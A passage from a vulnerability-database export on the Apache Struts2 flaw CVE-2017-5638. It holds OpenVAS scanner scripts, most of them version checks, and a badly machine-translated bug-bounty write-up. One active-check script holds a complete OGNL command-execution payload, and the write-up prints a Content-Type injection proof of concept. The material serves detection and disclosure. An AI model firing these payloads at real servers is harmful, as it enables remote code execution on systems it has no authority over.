script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Crowd Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_crowd_detect.nasl\");\n script_mandatory_keys(\"atlassian_crowd/installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Crowd uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Crowd 2.8.3 until 2.9.6, 2.10.1 until 2.10.2 and 2.11.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.9.7, 2.10.3, 2.11.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/CWD-4879\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"2.8.3\", test_version2: \"2.9.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.9.7\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": 